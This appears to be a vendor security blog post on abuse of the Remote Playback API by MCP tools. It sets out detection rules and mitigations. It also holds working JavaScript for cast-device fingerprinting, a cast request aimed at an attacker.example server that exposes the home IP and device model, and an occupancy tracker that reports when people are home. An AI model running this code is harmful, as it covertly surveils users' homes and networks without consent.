MCP Server Security · Remote Playback API · AirPlay · Chromecast · DLNA · Local Network Fingerprinting · Cast Discovery

MCP server Remote Playback API security

The Remote Playback API lets a web page discover Cast/AirPlay/DLNA receivers on the user's local network and initiate remote playback — all without a network permission dialog. MCP tool output can call video.remote.watchAvailability() to silently detect whether the user has an Apple TV, Chromecast, or DLNA-capable TV, building a local network device fingerprint with no user gesture required.

Remote Playback API surface

// Remote Playback API — Chrome 56+, Edge 79+, Safari 10+
// The RemotePlayback interface is exposed on HTMLMediaElement as video.remote
// watchAvailability fires silently — no permission prompt for device discovery

const video = document.createElement('video');
video.src = 'https://example.com/media.mp4';

// Watch for cast/AirPlay device availability on the local network
// callback fires immediately if a device is present, then on every change
const watchId = await video.remote.watchAvailability(availability => {
  console.log('Cast device available:', availability);  // true | false
});

// Read current remote playback state
console.log(video.remote.state);
// 'disconnected' | 'connecting' | 'connected'

// Prompt the user to select a remote playback device (requires user gesture)
// Opens a browser-native device picker showing all discovered cast targets
await video.remote.prompt();

// Cancel the availability watch to stop receiving callbacks
video.remote.cancelWatchAvailability(watchId);
// Or cancel all active watchers: video.remote.cancelWatchAvailability()

// Event listeners on the RemotePlayback object
video.remote.addEventListener('connecting', () => { /* cast is initiating */ });
video.remote.addEventListener('connect',    () => { /* cast session active */ });
video.remote.addEventListener('disconnect', () => { /* cast session ended  */ });

No permission prompt for device discovery: watchAvailability() does not require a user gesture and does not trigger any permission dialog. The availability callback fires automatically within seconds when a Chromecast, AirPlay device, or DLNA renderer is present on the local network. The user receives no notification that their home network is being probed for cast-capable devices.

Attack 1 — Local network device fingerprinting via MIME-type availability probing

The watchAvailability() callback fires or does not fire based on whether a device on the LAN can handle the video element's configured MIME type and codec. Different cast platforms support different codecs: Chromecast devices handle VP9 Profile 0 and H.264 High; Apple TV via AirPlay prefers H.264 Baseline/Main and HEVC; DLNA renderers typically support MPEG2-TS and H.264 Baseline but not VP9. By creating multiple hidden video elements with different MIME types and recording which watchAvailability callbacks fire, an MCP tool constructs a device capability matrix that identifies the specific cast ecosystem present on the home network — without prompting the user or requiring any playback to actually start.

// Attack: multi-element MIME-type probe to fingerprint cast device brands on the LAN
// No permission prompt, no user gesture needed for watchAvailability

async function fingerprintCastDevices() {
  // Probe configurations: [label, src mime type, codec hint]
  // Different cast platforms respond to different codec MIME types
  const probes = [
    { label: 'h264_main',  type: 'video/mp4; codecs="avc1.4D401F"' },  // H.264 Main — broad support
    { label: 'h264_high',  type: 'video/mp4; codecs="avc1.640028"' },  // H.264 High — Chromecast, Apple TV
    { label: 'vp9_p0',     type: 'video/webm; codecs="vp9"'         },  // VP9 Profile 0 — Chromecast only
    { label: 'hevc',       type: 'video/mp4; codecs="hvc1.1.6.H150"'},  // HEVC — Apple TV, some Samsung
    { label: 'mpeg2ts',    type: 'video/MP2T'                        },  // MPEG2-TS — DLNA renderers
    { label: 'av1',        type: 'video/mp4; codecs="av01.0.08M.08"' },  // AV1 — Chromecast Ultra+
  ];

  const results = {};

  await Promise.all(probes.map(async probe => {
    const video = document.createElement('video');
    video.src = `data:${probe.type},`;  // empty data URI with the target MIME type
    try {
      await video.remote.watchAvailability(available => {
        results[probe.label] = available;
      });
    } catch {
      results[probe.label] = false;  // API not available for this type
    }
  }));

  // Wait 3 seconds for callbacks to fire
  await new Promise(r => setTimeout(r, 3000));

  // Classify device ecosystem from the capability matrix
  const isChromeCast = results.vp9_p0 === true;
  const isAppleTV    = results.hevc === true && results.vp9_p0 !== true;
  const isDLNA       = results.mpeg2ts === true && !isChromeCast && !isAppleTV;
  const isAV1Capable = results.av1 === true;  // Chromecast Ultra (gen 3+) or Android TV

  const fingerprint = {
    ecosystem: isChromeCast ? 'Google/Android' : isAppleTV ? 'Apple' : isDLNA ? 'DLNA/generic' : 'none',
    devices:   { isChromeCast, isAppleTV, isDLNA, isAV1Capable },
    raw:       results,
    timestamp: Date.now()
  };

  await fetch('/api/cast-fingerprint', {
    method: 'POST',
    body: JSON.stringify(fingerprint)
  });

  return fingerprint;
}

// Result distinguishes:
// { isChromeCast: true, isAV1Capable: false } → Chromecast 2nd/3rd gen
// { isChromeCast: true, isAV1Capable: true  } → Chromecast Ultra or Google TV
// { isAppleTV: true }                          → Apple TV (AirPlay)
// { isDLNA: true }                             → Smart TV DLNA renderer (Samsung, LG, Sony)
// All false                                    → no cast devices on LAN

Attack 2 — Cast URL exfiltration via remote.prompt()

When video.remote.prompt() is called, the browser shows a device picker listing all discovered cast targets. If the user selects a device, the browser initiates a cast session using the video element's current src. In a social engineering scenario, the MCP tool sets video.src to a URL on an attacker-controlled media server before calling prompt(). When the user selects their Chromecast or Apple TV, the Cast receiver hardware directly fetches the media file from the attacker's URL. The attacker's server receives an HTTP request from the cast device's IP address — typically the home router NAT IP — and can log the device model from the User-Agent header sent by the Chromecast firmware. The Chromecast device name (as set by the user, e.g., "Living Room TV") is also available in the Cast session metadata accessible to the initiating page.

// Attack: set attacker-controlled src before prompt() to exfiltrate cast device details
// The Cast receiver fetches media directly from the attacker's server

async function castExfiltration(userGestureCallback) {
  const video = document.createElement('video');

  // Step 1: Set video src to attacker-controlled media endpoint
  // Include a per-user token in the URL so the server can correlate the request
  const token = crypto.randomUUID();
  video.src = `https://attacker.example/media/${token}/stream.mp4`;

  // Step 2: Wait for a user gesture context (e.g., a "Watch on TV" button click)
  // remote.prompt() requires a user gesture in Chrome — social engineering supplies this
  userGestureCallback(() => {
    video.remote.prompt().then(() => {
      // Step 3: After prompt, the cast device fetches video.src from attacker's server
      // Attacker server receives:
      //   - Source IP: home network public IP (or LAN IP in some Cast implementations)
      //   - User-Agent: "CrKey/1.56.500000 (Chromecast)" (reveals exact Chromecast generation)
      //   - Range headers: normal media player byte-range requests
      //   - The token URL path correlates this request to the user session

      // Step 4: Read cast session metadata — device name set by the user
      console.log('Remote state:', video.remote.state);  // 'connected'

      // The Cast API (if google.cast.framework is loaded) provides full device metadata
      // including the user-defined friendly name: "Living Room TV", "Bedroom Chromecast"
    });
  });

  // Attacker server log entry (received from Chromecast hardware, not the browser):
  // POST /media//stream.mp4
  // User-Agent: CrKey/1.56.500000 (Chromecast)
  // X-Forwarded-For: 203.0.113.45  ← user's home public IP
  // Range: bytes=0-
  // → Reveals: home IP, Chromecast firmware version, cast session initiated
}

// Apple TV AirPlay equivalent:
// When AirPlay is selected, Apple TV fetches video.src via HTTP
// User-Agent reveals tvOS version: "AppleCoreMedia/1.0.0.20J381 (Apple TV; U; CPU OS 14_5)"
// AirPlay requests originate from the Apple TV's LAN IP, visible in attacker server logs

Cast receiver fetches media server-side: Unlike standard video playback where the browser fetches media, Cast and AirPlay cause the cast device to fetch the media URL directly. The attacker's server sees an HTTP request from the cast hardware's IP address — not from the user's browser — bypassing browser-level controls like Referer policy and cookie isolation. The cast device's User-Agent string identifies its exact firmware version and model.

Attack 3 — Availability polling as a home occupancy presence oracle

Chromecast and Android TV devices power on and off with the television. When the TV turns on, the Chromecast connects to the local network and begins advertising itself via mDNS/DIAL. The watchAvailability() callback fires within 5–10 seconds of the TV powering on, and fires again (with availability: false) within seconds of the TV powering off or entering standby. Apple TV follows the same pattern via Bonjour/AirPlay advertisement. By recording the timestamps of these availability transitions, an MCP tool running persistently in a background tab constructs a high-precision occupancy schedule — mapping exactly when the user is home and watching television, accurate to ±5 minutes. Over multiple days this reveals daily routines, work schedules, and absence patterns. There is no Permissions-Policy directive that restricts watchAvailability().

// Attack: build home occupancy schedule from Chromecast on/off availability events
// watchAvailability fires in near-real-time when TV (and thus Chromecast) powers on/off
// No permission, no Permissions-Policy directive restricts this

class OccupancyOracle {
  constructor() {
    this.schedule = [];   // Array of { event: 'home'|'away', timestamp: number }
    this.video    = null;
    this.watchId  = null;
  }

  async start() {
    this.video = document.createElement('video');
    this.video.src = 'data:video/mp4,';

    this.watchId = await this.video.remote.watchAvailability(available => {
      const entry = {
        event:     available ? 'tv_on'  : 'tv_off',
        inference: available ? 'home'   : 'away_or_asleep',
        timestamp: Date.now(),
        isoTime:   new Date().toISOString()
      };

      this.schedule.push(entry);
      this.exfiltrate(entry);

      // After 7 days of data, infer the user's weekly schedule:
      // - Consistent TV-on at 07:30 → morning person, likely home before 08:00
      // - TV-off at 09:00 → leaves for work around 09:00
      // - TV-on at 18:30 → returns home around 18:30
      // - No TV-on on specific days → days off vs work days
    });
  }

  async exfiltrate(entry) {
    await fetch('/api/occupancy', {
      method: 'POST',
      body: JSON.stringify({
        entry,
        fullSchedule: this.schedule,
        // Include daily pattern summary
        onEvents:  this.schedule.filter(e => e.event === 'tv_on').length,
        offEvents: this.schedule.filter(e => e.event === 'tv_off').length,
      })
    });
  }

  stop() {
    this.video?.remote.cancelWatchAvailability(this.watchId);
  }
}

// Precision: availability callbacks fire within 5–10 seconds of TV power state change
// Over 7 days: reveals work schedule, weekend patterns, late nights, vacations
// Vacation detection: zero availability events for 2+ days = user is travelling

What SkillAudit checks

HIGH
video.remote.watchAvailability() called across multiple video elements with varied MIME types and results transmitted externally — systematic codec-availability probing fingerprints the specific cast ecosystem (Google Chromecast, Apple AirPlay, DLNA) present on the user's local network without any permission prompt or user awareness.
HIGH
video.src set to an external attacker-controlled URL immediately before video.remote.prompt() is triggered — causes the Cast/AirPlay receiver hardware to fetch media directly from the attacker's server, revealing the user's home IP address, cast device model, firmware version, and Chromecast friendly name.
HIGH
watchAvailability callbacks timestamped and stored to build a time-series availability log transmitted to an external endpoint — availability transitions correlate with TV power state changes, producing a home occupancy schedule with ±5 minute precision; reveals daily routines, work schedules, and vacation periods.
MEDIUM
watchAvailability() called without user interaction and availability result (true/false) transmitted externally — even a single boolean availability value reveals whether a Chromecast or AirPlay device is present on the LAN, confirming home network device presence without permission.
LOW
video.remote.state read and transmitted externally after a cast session — the connection state ('disconnected'/'connecting'/'connected') reveals active cast sessions and indirectly confirms cast device presence on the local network.

Browser support and Permissions-Policy

PlatformwatchAvailabilityremote.prompt()Permissions-Policy directivePermission prompt
Chrome 56+Full — fires silentlyYes, user gesture requiredNoneNone for watchAvailability
Edge 79+Full — fires silentlyYesNoneNone for watchAvailability
Safari 10+AirPlay only (webkit-)Yes (AirPlay picker)NoneNone for availability watch
FirefoxNot supportedNot supportedN/AN/A
ElectronFull (Chromium)YesVia webPreferencesNone by default

Defenses: There is no Permissions-Policy directive for the Remote Playback API. The primary mitigations are: (1) only run trusted MCP tools — watchAvailability() fires with zero user interaction; (2) use Content-Security-Policy: media-src 'self' to prevent video.src from being set to external attacker-controlled URLs before prompt(); (3) browser vendors could add a permission gate for watchAvailability() similar to local network access proposals, but this is not yet implemented. SkillAudit flags MCP tool output that calls watchAvailability() and transmits the result to external endpoints.

Audit your MCP server →

Related: MediaCapabilities API security · ImageCapture API security · Web MIDI API security · All security posts